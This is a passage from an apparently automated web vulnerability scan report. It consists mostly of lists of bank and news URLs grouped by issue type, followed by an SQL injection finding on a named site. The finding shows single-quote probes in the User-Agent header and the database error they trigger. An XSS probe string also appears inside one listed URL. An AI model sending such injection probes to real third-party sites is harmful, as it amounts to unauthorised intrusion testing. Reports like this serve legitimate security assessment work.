19.99. https://www.google.com/accounts/Login

19.100. https://www.google.com/accounts/ServiceLogin

19.101. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house

19.102. http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919

19.103. http://www.invisionpower.com/company/contact.php

19.104. http://www.invisionpower.com/legal/privacy.php

19.105. http://www.invisionpower.com/suite/demo.php

19.106. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

19.107. http://www.jpmorgan.com/script/jquery.pngFix.pack.js

19.108. http://www.jpmorgan.com/script/lightbox_support/controls.js

19.109. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx

19.110. http://www.lokeshdhakar.com/

19.111. http://www.macaudailytimes.com.mo/compress.php

19.112. https://www.navyfederal.org/account-management/how-do-i.php

19.113. https://www.navyfederal.org/js/facebox.js

19.114. https://www.navyfederal.org/js/jquery.pngFix.js

19.115. http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916

19.116. http://www.nickstakenburg.com/

19.117. http://www.nickstakenburg.com/projects/lightview/

19.118. http://www.opensource.org/licenses/gpl-license.php

19.119. http://www.opensource.org/licenses/mit-license.php

19.120. http://www.perishablenews.com/index.php

19.121. http://www.perishablenews.com/index.php

19.122. https://www.pnc.com/webapp/sec/Forms.do

19.123. https://www.pnc.com/webapp/unsec/Blank.do

19.124. https://www.pnc.com/webapp/unsec/depositRates/init.app

19.125. https://www.pnc.com/webapp/unsec/homeEquity/init.app

19.126. http://www.positioniseverything.net/easyclearing.html

19.127. http://www.retirement.merrilledge.com/publish/js/2010.12.14/global_min.js

19.128. http://www.sipc.org/

19.129. http://www.thestandard.com.hk/news_detail.asp

19.130. http://www.w3.org/TR/html4/loose.dtd

19.131. http://www.w3.org/TR/html4/strict.dtd

19.132. https://www.wachovia.com/common_files/metrics/vignette/stats.js

19.133. https://www.wachovia.com/files/Hands_on_Banking.pdf

19.134. http://www.wcti12.com/news/26551757/detail.html

19.135. https://www.wellsfargo.com/equity/

19.136. https://www.wellsfargo.com/help/

19.137. https://www.wellsfargo.com/privacy_security/

19.138. https://www.wellsfargo.com/privacy_security/fraud/

19.139. https://www.wellsfargo.com/privacy_security/fraud/report/

19.140. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

20. Private IP addresses disclosed

20.1. http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html

20.2. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

20.3. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

20.4. http://www.firstnational.com/config/html/en/searchresults.asp

20.5. http://www.firstnational.com/config/html/en/searchresults.asp

20.6. http://www.google.com/sdch/GeNLY2f-.dct

20.7. http://www.viglink.com/

21. Social security numbers disclosed

21.1. http://m.usa.visa.com/m/assistance/lost.jsp

21.2. http://usa.visa.com/personal/security/get-help-now.html

21.3. http://usa.visa.com/personal/using_visa/visa_travelers_cheques.html

22. Credit card numbers disclosed

22.1. http://www.arbornetworks.com/dmdocuments/ISR2008_US.pdf

22.2. http://www.arbornetworks.com/dmdocuments/WISP_US_12sept07.pdf

22.3. http://www.arbornetworks.com/dmdocuments/WorldwideInfrastructureSecurityReport_US_sept06.pdf

23. Cacheable HTTPS response

23.1. https://app.icontact.com/icp/signup.php

23.2. https://arbor.custhelp.com/ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png

23.3. https://careers.jpmorganchase.com/

23.4. https://content.pncmc.com/live/pnc/careers/main/index.html

23.5. https://content.pncmc.com/live/pnc/personal/OLBDemo/sgtour.html

23.6. https://fls.doubleclick.net/activityi

23.7. https://mfasa.chase.com/auth/fcc/login

23.8. https://online.wellsfargo.com/common/html/wibdisc.html

23.9. https://picasaweb.google.com/lh/view

23.10. https://secure.ed4.net/charteronebank/genenroll/signup.cfm

23.11. https://secure.ed4.net/citizensbank/genenroll/signup.cfm

23.12. https://secure.img-cdn.mediaplex.com/0/13770/universal.html

23.13. https://secure.opinionlab.com/ccc01/comment_card.asp

23.14. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

23.15. https://secure.opinionlab.com/rate36s.asp

23.16. https://www.1sttools.com/loginout/login.asp

23.17. https://www.chase.com/

23.18. https://www.chase.com/Chase.html

23.19. https://www.chase.com/auto-loan/car-loan.htm

23.20. https://www.chase.com/ccp/index.jsp

23.21. https://www.chase.com/ccpmweb/shared/document/webtrends.html

23.22. https://www.chase.com/chf/mortgage/om_chasecom_redirect

23.23. https://www.chase.com/cm/chf/miscellaneous/page/hmda.html

23.24. https://www.chase.com/index.jsp

23.25. https://www.chase.com/online/Checking/chase-checking-account.htm

23.26. https://www.chase.com/online/Home-Lending/mortgages.htm

23.27. https://www.chase.com/online/Home-Refinance/mortgage-refinancing.htm

23.28. https://www.chase.com/online/auto-loan/car-loan.htm

23.29. https://www.chase.com/online/investments/annuities.htm

23.30. https://www.chase.com/online/investments/financial-services.htm

23.31. https://www.chase.com/online/services/branch-message.htm

23.32. https://www.chase.com/wamuwelcome3/

23.33. https://www.citicapitaladvisors.com/

23.34. https://www.ibsnetaccess.com/spotlight/ibsspotlight.html

23.35. https://www.merrilledge.com/m/pages/home.aspx

23.36. https://www.myschedule.navyfederal.org/

23.37. https://www.mystreetscape.com/my/charteroneinvest

23.38. https://www.mystreetscape.com/my/citizensinvest

23.39. https://www.navyfederal.org/

23.40. https://www.navyfederal.org/about/about.php

23.41. https://www.navyfederal.org/about/eligibility-checklist.php

23.42. https://www.navyfederal.org/about/presidents-message.php

23.43. https://www.navyfederal.org/account-management/how-do-i.php

23.44. https://www.navyfederal.org/account-management/index.php

23.45. https://www.navyfederal.org/assets/rates/discl.html

23.46. https://www.navyfederal.org/branches-atms/index.php

23.47. https://www.navyfederal.org/browser-requirements.html

23.48. https://www.navyfederal.org/contact-us.php

23.49. https://www.navyfederal.org/favicon.ico

23.50. https://www.navyfederal.org/how-to-become-a-member.php

23.51. https://www.navyfederal.org/index.php

23.52. https://www.navyfederal.org/life-money/family-life.php

23.53. https://www.navyfederal.org/life-money/kids-college-retirement.php

23.54. https://www.navyfederal.org/life-money/managing-your-money/managing-your-money.php

23.55. https://www.navyfederal.org/life-money/military-life.php

23.56. https://www.navyfederal.org/life-money/savings-investments.php

23.57. https://www.navyfederal.org/life-money/work-life.php

23.58. https://www.navyfederal.org/membership-benefits/military-exclusives.php

23.59. https://www.navyfederal.org/membership-benefits/offers-discounts/auto-199.php

23.60. https://www.navyfederal.org/membership-benefits/offers-discounts/balanceTransferOffer.php

23.61. https://www.navyfederal.org/membership-benefits/offers-discounts/offers-discounts.php

23.62. https://www.navyfederal.org/mobile/mobiledemo.php

23.63. https://www.navyfederal.org/pdf/ebrochures/1116e.pdf

23.64. https://www.navyfederal.org/pdf/publications/NFCU_198_PrivacyPolicy.pdf

23.65. https://www.navyfederal.org/products-services/business-services/business-services.php

23.66. https://www.navyfederal.org/products-services/business-services/credit-cards.php

23.67. https://www.navyfederal.org/products-services/business-services/loans.php

23.68. https://www.navyfederal.org/products-services/business-services/retirement-insurance.php

23.69. https://www.navyfederal.org/products-services/business-services/savings-checking.php

23.70. https://www.navyfederal.org/products-services/cards/creditcards/creditcard-rates.php

23.71. https://www.navyfederal.org/products-services/cards/creditcards/creditcards.php

23.72. https://www.navyfederal.org/products-services/cards/debit-cards.php

23.73. https://www.navyfederal.org/products-services/cards/giftcards/gift-cards.php

23.74. https://www.navyfederal.org/products-services/checking-savings/certificates-rates.php

23.75. https://www.navyfederal.org/products-services/checking-savings/certificates.php

23.76. https://www.navyfederal.org/products-services/checking-savings/checking-protection.php

23.77. https://www.navyfederal.org/products-services/checking-savings/checking-rates.php

23.78. https://www.navyfederal.org/products-services/checking-savings/checking.php

23.79. https://www.navyfederal.org/products-services/checking-savings/direct-deposit.php

23.80. https://www.navyfederal.org/products-services/checking-savings/iras.php

23.81. https://www.navyfederal.org/products-services/checking-savings/money-market.php

23.82. https://www.navyfederal.org/products-services/checking-savings/savings-rates.php

23.83. https://www.navyfederal.org/products-services/checking-savings/savings.php

23.84. https://www.navyfederal.org/products-services/investments-insurance/events.php

23.85. https://www.navyfederal.org/products-services/investments-insurance/insurance.php

23.86. https://www.navyfederal.org/products-services/investments-insurance/investments.php

23.87. https://www.navyfederal.org/products-services/investments-insurance/nffg.php

23.88. https://www.navyfederal.org/products-services/investments-insurance/tax-center.php

23.89. https://www.navyfederal.org/products-services/investments-insurance/trust-services.php

23.90. https://www.navyfederal.org/products-services/loans/auto/auto-loans.php

23.91. https://www.navyfederal.org/products-services/loans/auto/auto-rates.php

23.92. https://www.navyfederal.org/products-services/loans/boat-bike-rv/boat-bike-rv-loans.php

23.93. https://www.navyfederal.org/products-services/loans/equity/equity.php

23.94. https://www.navyfederal.org/products-services/loans/mortgage/mortgage-rates.php

23.95. https://www.navyfederal.org/products-services/loans/mortgage/mortgage.php

23.96. https://www.navyfederal.org/products-services/loans/other/more-loans.php

23.97. https://www.navyfederal.org/products-services/loans/realtyplus.php

23.98. https://www.navyfederal.org/products-services/switch-to-navy-federal.php

23.99. https://www.navyfederal.org/search.php

23.100. https://www.navyfederal.org/site-map.php

23.101. https://www.navyfederal.org/usa-federal-credit-union-merger/index.php

23.102. https://www.navyfederal.org/vendors/vendorMain.php

23.103. https://www.navyfederal.org/visabuxx/visa-buxx.php

23.104. https://www.navyfederal.org/why-choose-navy-federal.php

23.105. https://www.pnc.com/MapQuest/mqlocator/index.html

23.106. https://www.pnc.com/searchpnc/servlets/SearchPNCServletOnePNC

23.107. https://www.pnc.com/webapp/sec/Forms.do

23.108. https://www.pnc.com/webapp/sec/ProductsAndService.do

23.109. https://www.pnc.com/webapp/unsec/Blank.do

23.110. https://www.pnc.com/webapp/unsec/Gateway.do

23.111. https://www.pnc.com/webapp/unsec/Homepage.do

23.112. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

23.113. https://www.pnc.com/webapp/unsec/ProductsAndService.do

23.114. https://www.pnc.com/webapp/unsec/Solutions.do

23.115. https://www.pnc.com/webapp/unsec/depositRates/init.app

23.116. https://www.pnc.com/webapp/unsec/homeEquity/init.app

23.117. https://www.pncsites.com/IRA/home.html

23.118. https://www.pncsites.com/points/index.html

23.119. https://www.pncvirtualwallet.com/

23.120. https://www.wachovia.com/

23.121. https://www.wachovia.com/common_files/metrics/tc/tc_targeting.html

23.122. https://www.wachovia.com/files/Hands_on_Banking.pdf

23.123. https://www.wellsfargo.com/about/diversity/

23.124. https://www.wellsfargo.com/autoloans/

23.125. https://www.wellsfargo.com/browser/jaws_setting

23.126. https://www.wellsfargo.com/careers/

23.127. https://www.wellsfargo.com/checking/

23.128. https://www.wellsfargo.com/credit_cards/

23.129. https://www.wellsfargo.com/equity/

23.130. https://www.wellsfargo.com/help/

23.131. https://www.wellsfargo.com/help/faqs/signon_faqs

23.132. https://www.wellsfargo.com/help/services

23.133. https://www.wellsfargo.com/insurance/

23.134. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft

23.135. https://www.wellsfargo.com/investing/hsa/enroll

23.136. https://www.wellsfargo.com/investing/investmentservices/

23.137. https://www.wellsfargo.com/investing/more

23.138. https://www.wellsfargo.com/investing/mutual_funds/

23.139. https://www.wellsfargo.com/investing/retirement/

23.140. https://www.wellsfargo.com/investing/retirement/openira/

23.141. https://www.wellsfargo.com/jump/about/fdic

23.142. https://www.wellsfargo.com/jump/applications/inprogress

23.143. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

23.144. https://www.wellsfargo.com/jump/wachovia/insurance/identity

23.145. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

23.146. https://www.wellsfargo.com/mortgage/

23.147. https://www.wellsfargo.com/mortgage/rates

23.148. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/

23.149. https://www.wellsfargo.com/per/more/banking

23.150. https://www.wellsfargo.com/per/more/loans_credit

23.151. https://www.wellsfargo.com/personal_credit/

23.152. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main

23.153. https://www.wellsfargo.com/privacy_security/

23.154. https://www.wellsfargo.com/privacy_security/fraud/

23.155. https://www.wellsfargo.com/privacy_security/fraud/report/

23.156. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

23.157. https://www.wellsfargo.com/privacy_security/online/guarantee

23.158. https://www.wellsfargo.com/products_services/applications_viewall

23.159. https://www.wellsfargo.com/rates/rates_viewall

23.160. https://www.wellsfargo.com/savings_cds/

23.161. https://www.wellsfargo.com/savings_cds/apply

23.162. https://www.wellsfargo.com/savings_cds/cds

23.163. https://www.wellsfargo.com/sitemap

23.164. https://www.wellsfargo.com/student/

23.165. https://www.wellsfargo.com/tas

23.166. https://www.wellsfargo.com/theprivatebank/

23.167. https://www.wellsfargo.com/wachovia

23.168. https://www.wellsfargo.com/wachovia/

23.169. https://www.wellsfargo.com/wachovia/autoloans/index

23.170. https://www.wellsfargo.com/wachovia/insurance

23.171. https://www.wellsfargo.com/wachovia/wealthmanagement/index

23.172. https://www.wellsfargo.com/wfonline/

23.173. https://www.wellsfargo.com/wfonline/bill_pay/

23.174. https://www.wellsfargoadvisors.com/

23.175. https://www2.bankofamerica.com/cferror.cgi

23.176. https://www2.bankofamerica.com/favicon.ico

23.177. https://www3.financialtrans.com/tf/FANWeb

24. Multiple content types specified

24.1. http://sr2.liveperson.net/visitor/addons/deploy.asp

24.2. http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html

25. HTML does not specify charset

25.1. http://a.tribalfusion.com/

25.2. http://a.tribalfusion.com/j.ad

25.3. http://ad.thehill.com/favicon.ico

25.4. http://ai.hitbox.com/ai

25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.6. https://careers.jpmorganchase.com/

25.7. http://cdn.invisionpower.com/public/min/index.php

25.8. https://charterone.mortgagewebcenter.com/ApplyNow/Application.asp

25.9. https://citizensbankri.mortgagewebcenter.com/ApplyNow/Application.asp

25.10. http://community.invisionpower.com/clickheat/click.php

25.11. http://famspam.com/facebox/

25.12. http://fls.doubleclick.net/activityi

25.13. https://fls.doubleclick.net/activityi

25.14. http://image.wareseeker.com/software/78/index_565291.gif

25.15. http://jqueryui.com/about

25.16. http://news.google.com/intl/en_us/about.html

25.17. https://online.wellsfargo.com/common/html/wibdisc.html

25.18. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

25.19. https://secure.opinionlab.com/rate36s.asp

25.20. http://sr2.liveperson.net/visitor/addons/deploy.asp

25.21. http://usa.visa.com/ext/nav/footer.html

25.22. http://usa.visa.com/js/customanalink.js

25.23. http://usa.visa.com/personal/security/protect_yourself/common_frauds/phishing.html

25.24. http://usa.visa.com/personal/security/protect_yourself/visa_security_tips.html

25.25. http://usa.visa.com/personal/security/vbv/index.html

25.26. http://usa.visa.com/sitewide/sitemap.html

25.27. http://usbank.com/privacy_pledge.html

25.28. http://vendorweb.citibank.com/HG

25.29. http://redcated/jaction/avevao_SOmainFooterIFrame_10

25.30. https://redcated/iaction/deupnc_PersonalBankingHome_4

25.31. http://wealthmanagement.bankofamerica.com/

25.32. https://www.1sttools.com/loginout/login.asp

25.33. http://www.arbornetworks.com/en/contact-us.html

25.34. http://www.bankofamerica.com/deposits/checksave491c6%22%3E%3Cscript%3Ealert(1)%3C/script%3E20cb5e334dd/index.cfm

25.35. https://www.chase.com/online/Home/Chase-Home.dwt

25.36. https://www.chase.com/online/auto-loan/car-loan.html

25.37. https://www.chase.com/wamuwelcome3/

25.38. http://www.citi.com/CBOL/Home

25.39. http://www.citi.com/JRS/helpcenter/getHelpContent.do

25.40. http://www.citi.com/domain/disclaim/

25.41. http://www.citi.com/domain/home.htm

25.42. http://www.citi.com/domain/redirect/corp/asst_man.htm

25.43. http://www.citi.com/domain/redirect/corp/cdob.htm

25.44. http://www.citi.com/domain/redirect/corp/cg_sec_svcs.htm

25.45. http://www.citi.com/domain/redirect/corp/cgts.htm

25.46. http://www.citi.com/domain/redirect/corp/diners.htm

25.47. http://www.citi.com/domain/redirect/corp/e_biz.htm

25.48. http://www.citi.com/domain/redirect/corp/exp_bank.htm

25.49. http://www.citi.com/domain/redirect/corp/fund_svcs.htm

25.50. http://www.citi.com/domain/redirect/corp/merc_ser.htm

25.51. http://www.citi.com/domain/redirect/corp/private.htm

25.52. http://www.citi.com/domain/redirect/corp/trade_svcs.htm

25.53. http://www.citi.com/domain/redirect/search/sm_biz/401k.htm

25.54. http://www.citi.com/domain/redirect/search/sm_biz/biz_aadv.htm

25.55. http://www.citi.com/domain/redirect/search/sm_biz/biz_plat.htm

25.56. http://www.citi.com/domain/redirect/search/sm_biz/cit_biz.htm

25.57. http://www.citi.com/domain/redirect/search/sm_biz/citi_cap.htm

25.58. http://www.citi.com/domain/redirect/search/sm_biz/citibiz.htm

25.59. http://www.citi.com/domain/redirect/search/sm_biz/glance.htm

25.60. http://www.citi.com/domain/redirect/search/sm_biz/merc_ser.htm

25.61. http://www.citi.com/domain/redirect/search/sm_biz/realest.htm

25.62. http://www.citi.com/domain/redirect/search/us.htm

25.63. http://www.citi.com/domain/scripts/config.js

25.64. http://www.citi.com/favicon.ico

25.65. http://www.citi.com/privacy/us_priv.htm

25.66. http://www.citi.com/resourcs/misc/styles.css

25.67. http://www.citi.com/track/

25.68. http://www.citi.com/usc/05/multi/cvg/DPR/TY/April/default.htm

25.69. http://www.citi.com/usc/_spredir.htm

25.70. https://www.citicapitaladvisors.com/

25.71. http://www.firstnational.com/001/html/en/about_us/about_us.html

25.72. http://www.firstnational.com/001/html/en/about_us/careers/careers.html

25.73. http://www.firstnational.com/001/html/en/commercial/commercial.html

25.74. http://www.firstnational.com/001/html/en/personal/cardproducts/creditcards/credit_card_main.html

25.75. http://www.firstnational.com/001/html/en/personal/cardproducts/gift_cards/giftcards_index.html

25.76. http://www.firstnational.com/001/html/en/personal/faqs/tran/system_technical_requirements.html

25.77. http://www.firstnational.com/001/html/en/personal/online_serv/account_alerts.html

25.78. http://www.firstnational.com/001/html/en/personal/online_serv/activate_card.html

25.79. http://www.firstnational.com/001/html/en/personal/online_serv/credit_card_payments.html

25.80. http://www.firstnational.com/001/html/en/personal/online_serv/online_banking.html

25.81. http://www.firstnational.com/001/html/en/personal/online_serv/online_billpay.html

25.82. http://www.firstnational.com/001/html/en/personal/online_serv/online_services.html

25.83. http://www.firstnational.com/001/html/en/personal/online_serv/paperless_statements.html

25.84. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/banking_accounts.html

25.85. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html

25.86. http://www.firstnational.com/001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html

25.87. http://www.firstnational.com/001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html

25.88. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

25.89. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/vehicle_loans.html

25.90. http://www.firstnational.com/001/html/en/personal/personal.html

25.91. http://www.firstnational.com/001/html/en/personal/product_info.html

25.92. http://www.firstnational.com/001/html/en/personal/resource_center/brochures.html

25.93. http://www.firstnational.com/001/html/en/personal/resource_center/calculators.html

25.94. http://www.firstnational.com/001/html/en/personal/resource_center/newsletters/newsletters.html

25.95. http://www.firstnational.com/001/html/en/personal/resource_center/resource_center.html

25.96. http://www.firstnational.com/001/html/en/personal/resource_center/seminars.html

25.97. http://www.firstnational.com/001/html/en/personal/resource_center/tax_center/tax_center.html

25.98. http://www.firstnational.com/001/html/en/sitemap/sitemap.html

25.99. http://www.firstnational.com/001/html/en/small_business/small_business.html

25.100. http://www.firstnational.com/config/html/en/searchresults.asp

25.101. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html

25.102. http://www.google.com/instant/

25.103. http://www.google.com/intl/en/ads/

25.104. http://www.google.com/intl/en/options/

25.105. http://www.google.com/intl/en_us/ads/

25.106. http://www.ibsnetaccess.com/

25.107. https://www.ibsnetaccess.com/spotlight/ibsspotlight.html

25.108. http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species

25.109. https://www.myschedule.navyfederal.org/

25.110. https://www.mystreetscape.com/my/charteroneinvest

25.111. https://www.mystreetscape.com/my/citizensinvest

25.112. http://www.oneofacard.com/generalinfo2.asp

25.113. https://www.pnc.com/MapQuest/mqlocator/index.html

25.114. https://www.pncadvisors.com/ilink/index.html

25.115. https://www.pncadvisors.com/thirdpartyindex.html

25.116. https://www.pncsites.com/IRA/home.html

25.117. http://www.retirement.merrilledge.com/publish/images/

25.118. http://www.thestandard.com.hk/favicon.ico

25.119. http://www.thestandard.com.hk/news_detail.asp

25.120. http://www.usbank.com/cust_serv_cs.html

25.121. http://www.usbank.com/locators.html

25.122. https://www.wachovia.com/

25.123. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

25.124. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

25.125. https://www4.usbank.com/favicon.ico

26. HTML uses unrecognised charset

26.1. https://secure.opinionlab.com/ccc01/comment_card.asp

26.2. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

26.3. http://www.julong.com.cn/en/News/188.html

26.4. http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm

27. Content type incorrectly stated

27.1. https://a248.e.akamai.net/atlas.download.akamai.com/

27.2. http://a3.twimg.com/profile_images/357754763/cross_normal.gif

27.3. http://affiliate.invisionpower.com/scripts/track.php

27.4. http://api.maps.yahoo.com/ajaxymap

27.5. http://api.viglink.com/api/ping

27.6. https://arbor.custhelp.com/ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png

27.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.8. http://cdn.invisionpower.com/public/min/index.php

27.9. http://chat.livechatinc.net/licence/1043255/script.cgi

27.10. http://community.invisionpower.com/clickheat/click.php

27.11. http://community.invisionpower.com/public/js/3rd_party/prettify/lang-sql.js

27.12. https://content.pncmc.com/live/pnc/mastheads/flashMastheads/

27.13. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

27.14. http://evsecure-aia.verisign.com/EVSecure2006.cer

27.15. http://fx-rate.net/fx-rates.php

27.16. http://image.wareseeker.com/software/wii/abc/index_3be9d26a20-fasm.gif

27.17. http://image.wareseeker.com/software/wii/abc/index_3beab2d827-fasm.gif

27.18. http://image.wareseeker.com/software/wii/avatar/index_37932e028-fasm.gif

27.19. http://image.wareseeker.com/software/wii/avatar/index_3bf358a284-fasm.gif

27.20. http://image.wareseeker.com/software/wii/avatar/index_3bf57e24dc-fasm.gif

27.21. http://image.wareseeker.com/software/wii/hot/index_37e93d637-fasm.gif

27.22. http://image.wareseeker.com/software/wii/hot/index_3837e34dd-fasm.gif

27.23. http://image.wareseeker.com/software/wii/hot/index_3866c73c1-fasm.gif

27.24. http://news.google.com/complete/search

27.25. http://news.google.com/news/xhr/star

27.26. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

27.27. https://secure.opinionlab.com/rate36s.asp

27.28. http://spd.netconversions.com/

27.29. http://sr2.liveperson.net/hcp/html/mTag.js

27.30. http://sr2.liveperson.net/visitor/addons/deploy.asp

27.31. http://thehill.com/templates/thehill/favicon.ico

27.32. http://redcated/jaction/avevao_SOmainFooterIFrame_10

27.33. http://wareseeker.com/images/favicon.ico

27.34. http://www.arbornetworks.com/en/contact-us.html

27.35. http://www.bankofamerica.com/favicon.ico

27.36. http://www.bankofamerica.com/global/images/new_Banklogo.gif

27.37. https://www.bankofamerica.com/homepage/WidgetAction.go

27.38. https://www.bankofamerica.com/homepage/overview

27.39. https://www.capitalone.com/favicon.ico

27.40. http://www.charterone.com/ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx

27.41. http://www.charterone.com/ajax/common.ashx

27.42. http://www.charterone.com/images/standard-od.png

27.43. http://www.citizensbank.com/ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx

27.44. http://www.citizensbank.com/ajax/common.ashx

27.45. http://www.citizensbank.com/images/standard-od.png

27.46. http://www.facebook.com/extern/login_status.php

27.47. http://www.jpmorgan.com/cm/Satellite

27.48. http://www.jpmorgan.com/favicon.ico

27.49. https://www.navyfederal.org/favicon.ico

27.50. http://www.w3.org/TR/html4/loose.dtd

27.51. http://www.w3.org/TR/html4/strict.dtd

27.52. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

27.53. https://www.wachovia.com/foundation/v/index.jsp

27.54. https://www2.bankofamerica.com/favicon.ico

27.55. https://www4.usbank.com/internetBanking/RequestRouter

28. Content type is not specified



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.learningsolutions.com.hk/index.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:42 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:44 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 24854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...
</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

Request 2

GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:45 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 24436


